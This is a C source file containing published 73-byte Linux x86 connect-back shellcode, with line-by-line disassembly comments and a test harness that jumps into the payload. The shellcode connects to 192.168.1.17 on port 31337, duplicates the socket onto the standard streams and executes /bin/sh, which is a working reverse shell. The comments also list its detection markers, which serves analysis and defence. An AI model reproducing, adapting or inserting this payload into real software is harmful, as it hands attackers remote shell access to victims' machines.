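/*
 * (linux/x86) connect-back /bin/sh (port 31337)
 * 73 bytes
 *
 * http://www.gonullyourself.org
 * sToRm
 */
#include <stdio.h>
#include <string.h>

/*
 * Raw i386 machine code, kept byte-for-byte as published. The bytes contain
 * no NUL, so strlen() on the array yields the payload length (73); sizeof
 * is 74 because of the string terminator.
 *
 * Reading guide (follows the disassembly comments below):
 *   1. socketcall(SYS_SOCKET, {AF_INET, SOCK_STREAM, 0})  -> fd kept in %esi
 *   2. socketcall(SYS_CONNECT, {fd, &sockaddr_in, 0x10})  -- the sockaddr_in
 *      is assembled on the stack by the pushes: family 2 (%bx), port bytes
 *      7a 69 (31337 in network order), address bytes c0 a8 01 11 (192.168.1.17)
 *   3. dup2(fd, 2), dup2(fd, 1), dup2(fd, 0)              -- the jne loop;
 *      the loop relies on ZF from `dec %ecx` surviving int $0x80
 *   4. execve("/bin//sh", NULL, NULL)                     -- %ecx and %edx are
 *      zeroed by `mul %ecx` with %ecx == 0 after the loop
 *
 * For detection purposes the fixed socket→connect→dup2×3→execve sequence and
 * the hard-coded address/port bytes are the observable markers of this payload.
 */
char shellcode[] =
// <_start>:
"\x6a\x66"              // push $0x66          (SYS_socketcall)
"\x58"                  // pop %eax
"\x31\xdb"              // xor %ebx,%ebx
"\x53"                  // push %ebx           (protocol 0)
"\x43"                  // inc %ebx            (%ebx = 1 = SYS_SOCKET)
"\x53"                  // push %ebx           (SOCK_STREAM)
"\x6a\x02"              // push $0x2           (AF_INET)
"\x89\xe1"              // mov %esp,%ecx       (args array)
"\xcd\x80"              // int $0x80
"\x96"                  // xchg %eax,%esi      (save socket fd)
"\x6a\x66"              // push $0x66
"\x58"                  // pop %eax
"\x43"                  // inc %ebx
"\x68\xc0\xa8\x01\x11"  // push $0x1101a8c0    (sin_addr bytes c0 a8 01 11)
"\x66\x68\x7a\x69"      // pushw $0x697a       (sin_port bytes 7a 69)
"\x66\x53"              // push %bx            (sin_family = 2)
"\x89\xe1"              // mov %esp,%ecx       (&sockaddr_in)
"\x6a\x10"              // push $0x10          (addrlen)
"\x51"                  // push %ecx
"\x56"                  // push %esi           (socket fd)
"\x89\xe1"              // mov %esp,%ecx       (args array)
"\x43"                  // inc %ebx            (%ebx = 3 = SYS_CONNECT)
"\xcd\x80"              // int $0x80
"\x87\xde"              // xchg %ebx,%esi      (%ebx = socket fd)
"\x6a\x03"              // push $0x3
"\x59"                  // pop %ecx            (loop counter: 3, 2, 1)
// <dup2_loop>: (the jne below jumps back here)
"\x49"                  // dec %ecx
"\x6a\x3f"              // push $0x3f          (SYS_dup2)
"\x58"                  // pop %eax
"\xcd\x80"              // int $0x80           (dup2(fd, %ecx))
"\x75\xf8"              // jne 804808e         (-> dup2_loop while %ecx != 0)
"\xf7\xe1"              // mul %ecx            (%ecx == 0 -> %eax = %edx = 0)
"\x51"                  // push %ecx           (string terminator)
"\x68\x2f\x2f\x73\x68"  // push $0x68732f2f    ("//sh")
"\x68\x2f\x62\x69\x6e"  // push $0x6e69622f    ("/bin")
"\x89\xe3"              // mov %esp,%ebx       (path)
"\xb0\x0b"              // mov $0xb,%al        (SYS_execve)
"\xcd\x80"              // int $0x80
;

/*
 * Test harness: prints the payload length and then jumps into the array.
 *
 * Converting an object pointer to a function pointer is not portable ISO C
 * (GCC accepts it). The jump also depends on the data segment being
 * executable; on a build with non-executable data mappings the call is
 * expected to fault rather than run the payload. When the payload does run,
 * control never comes back here, so the trailing return is only reached if
 * f() returns unexpectedly.
 */
int main(void)
{
    void (*f)(void) = (void (*)(void))shellcode;

    /* strlen() returns size_t, so %zu is the matching conversion (the
     * original used %u, which mismatches the argument type). */
    printf("Length: %zu\n", strlen(shellcode));
    f();
    return 0;
}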